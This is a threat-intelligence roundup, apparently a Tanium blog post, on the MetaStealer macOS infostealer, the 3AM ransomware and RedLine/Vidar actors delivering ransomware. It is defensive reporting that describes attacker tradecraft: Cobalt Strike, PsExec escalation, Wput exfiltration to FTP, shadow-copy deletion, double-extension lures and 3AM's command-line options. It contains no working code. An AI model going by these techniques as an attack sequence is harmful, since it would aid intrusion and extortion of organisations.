CTI Roundup: Go Infostealers, 3AM Ransomware, & RedLine/Vidar Malware

First in this week’s roundup, CTI examines a new family of infostealers called MetaStealer that targets the macOS platform. Next is a look at a new ransomware family called 3AM that was recently discovered in the wild. Also included is an overview of the RedLine and Vidar malware families and how the threat actors behind them are distributing ransomware payloads with the same delivery techniques they use to spread infostealers.

1. New family of Go infostealers spreads in targeted attacks

Sentinel One has been tracking and analyzing a new family of macOS infostealers called MetaStealer to learn how it differs from other recent stealers.

According to SentinelOne, many of the MetaStealer samples are distributed in malicious application bundles within a dmg file. The files have names indicating that the targets were business users of Mac devices. Some of the file names include “advertising terms of reference (MacOS presentation).dmg,” “CONCEPT A3 full menu with dishes and translations to English.dmg,” “AnimatedPoster.dmg,” and “Brief_Presentation-Task_Overview-(SOW)-PlayersClub.dmg.”

One version of MetaStealer was called “Conract for paymen & confidentiality agreement Lucasprod.dmg” (typos included in actual file name). This file was uploaded to VirusTotal with a comment from the victim detailing how they were lured. The victim notes that they were lured by someone posing as a design client who sent them a password-protected zip file containing the malicious dmg. Other MetaStealer versions have used names masquerading as Adobe files or software.

Malicious application bundles

The applications contained within the disk images have the minimum requirements for creating a macOS bundle. The bundle contains an Info.plsit file, a resources folder containing an icon image, and a macOS folder containing the malicious executable. None of the samples seen by SentinelOne attached a code signature or used ad hoc singing, meaning the threat actor would likely need to persuade the victim into overriding protections like Gatekeeper.

The collected samples are single architecture x86_64 binaries and will only run on Apple Silicon M1 and M2 machines with the help of Rosetta. Samples of MetaStealer have been regularly uploaded to VirusTotal.

Obfuscated Go executable

The main executable is an Intel x86 Mach-O containing compiled and heavily obfuscated Go source code.

The obfuscation method is similar to that used in obfuscated Sliver and Poseidon malware binaries. Despite obfuscation, researchers identified functions for exfiltrating the keychain, extracting saved passwords, and grabbing files. Some of the versions contain methods to target Telegram and Meta services.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“MetaStealer’s emergence contributes to the recent trend of infostealers targeting Mac users. MetaStealer specifically targets business users of macOS devices, which is historically unusual for Mac malware that is typically distributed via cracked software or malvertising.”

“MetaStealer relies heavily on social engineering to lure victims into launching malicious payloads themselves. This is something that threat actors seem to be getting better and better at, therefore requiring us all to be more vigilant than ever.”

2. Researchers discover 3AM ransomware in the wild

Symantec has discovered a new ransomware family called 3AM in the wild. 3AM was detected in a single incident where an affiliate deployed the ransomware after an unsuccessful attempt to deploy LockBit in the network.

Background on 3AM ransomware

3AM is the name Symantec has given to the ransomware family based on references to 3AM in the ransom note and the appending of encrypted files with .threeamtime.

The ransomware is written in Rust and will attempt to stop multiple services before encrypting any files. After encryption is complete, it will attempt to delete Volume Shadow copies.

To date, 3AM ransomware has been very rarely observed. It was only seen in a single attack after a failed deployment of LockBit. At this time it is uncertain if its authors are linked to any known threat actors or groups.

Attack preparation

The first identified activity from the threat actor involved using the gpresult command to dump policy settings enforced on the computer for a particular user. The threat actor then executed various Cobalt Strike components before trying to escalate privileges using PsExec, ran reconnaissance commands (whoami, netstat, quser, netshare) and tried to enumerate other servers in the network for lateral movement. A new user was then added for persistence before using the Wput tool to exfiltrate files to an FTP server.

The threat actor first tried to deploy the LockBit ransomware, but it was blocked in the network. This forced the threat actor to resort to 3AM instead. The use of 3AM was only partially successful, as the threat actors only managed to deploy it to three machines of which two blocked the deployment.

3AM analysis

The ransomware is a 64-bit executable written in Rust. It recognizes the following command line parameters:

• “-k” – 32 Base64 characters, referred to as “Access key” in the ransom note
• “-p” – Unknown
• “-h” – Unknown
• “-m” – Method, where the code checks one of two values before running encryption logic:
• “local”
• “net”
• “-s” – determines offsets within files for encryption to control encryption speed. This is expressed in the form of decimal digits.

The command line parameters “-m” and “-h” are mutually exclusive. The usage of the “-h” and “-m” parameters and its values “local” and “net” are very similar to arguments used by Conti. When run, it will attempt to run a long list of commands, many of which try to stop various security and backup-related software.

The ransomware then scans the disk and files that match a predefined criterion, encrypting the files and deleting the originals. 3AM then creates the file “RECOVER-FILES.txt” in each scanned folder. This file contains the ransom note.

The encrypted files contain a marker string of 0x666 followed by the data appended by the ransomware. After completing its encryption routine, it will attempt to delete volume shadow backup copies.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“We don’t see a ton of reporting on threat actors that have tried to deploy one ransomware but switched to another when the first was blocked. And we see even less reporting on threat actors switching to ransomware that has never been seen before.”

“It seems like an interesting time to try out a new ransomware, using it as a backup plan instead of with intent. Since the 3AM ransomware was only partially successful, it could be that this threat actor is still developing 3AM and only pivoted to it because they had no other choice. Considering that it was used as a fallback by a supposed LockBit affiliate, it wouldn’t be a surprise to see more of 3AM in the future.”

3. RedLine/Vidar threat actors pivot to ransomware

Trend Micro has been tracking the RedLine and Vidar malware families since the middle of 2022. Both families have been used to target victims via spear-phishing. However, more recent investigations reveal the threat actors behind these malware families are now distributing ransomware payloads with the same delivery techniques they use to spread infostealers.

The threat actors are now seen sending a piece of infostealer malware with EV code signing certificates before sending ransomware payloads via the same route.

Background

Organizations receive extended validation code signing certificates once they verify their legal and physical existence in a country. There is an issuance process with extended identity verification compared to regular code signing certificates. The process also involves private key generation, which requires a hardware token.

Despite additional security measures being put in place earlier this year, there were over 30 EV code-signed samples used between July-August 2023 related to this campaign/activity. The Vidar infostealer related to this activity was polymorphous as each sample had a different hash. While there are previous instances of threat actors using EV certificates for their malware, Trend Micro notes this is the first time they have seen a threat actor with this many samples. It is not yet known how the threat actor accessed the private key.

Technical analysis

Threat actors using RedLine and Vidar use common techniques to lure victims into running malicious files. This often includes spear phishing, using double extensions and LNK files, and transferring malicious files through Google Drive.

In a case investigated by Trend Micro, the victim was receiving infostealer malware from a series of campaigns in the middle of July of this year. Then, on August 9, they received a ransomware payload after being tricked into downloading/opening a fake TripAdvisor complaint email attachment. The attachment used the common double extension technique — .pdf.htm — to trick the user into thinking it was a PDF.

After opening this attachment and clicking “read complaint,” the user unknowingly executed several JavaScript files. This in turn downloaded and executed “TripAdvisor Complaint-Possible Suspension.exe.” This executable connected to two URLs, reading and transforming the contents of a png file into encrypted shellcode. The shellcode was decrypted to generate yet another shellcode for injection.

The ransomware payload was eventually detected as Ransom.Win64.CYCLOPS.A and was injected into rgb9rast.exe — a legitimate 7-Zip standalone console application. This then dropped the ransom note, encrypted files with a .knight_l extension, and performed an outbound SMB connection to encrypt files on the network.

Additional indicators

The threat actors also used other file names for their malicious files without EV code signing such as “Additional informatoin about the reservation.exe” — spelling “informatoin” instead of “information” — and “TripAdvisor Complaint – Possible Suspension.exe ransomware.” These additional file names also used double extensions like jpg.exe and pdf.exe.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“Even though additional security measures were implemented, threat actors were still somehow able to distribute infostealing malware code signed with EV certificates.”

“It’s not yet known how the threat actor was able to obtain the private key needed to carry out this activity. This is something CTI hopes to learn more about in the future. Of more interest is the shift they made in this campaign from solely distributing malware to following up with ransomware payloads.”

“Given the popularity of ransomware over the past year (if not longer), it’s becoming more common to see threat actors jumping on the ransomware bandwagon.”

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.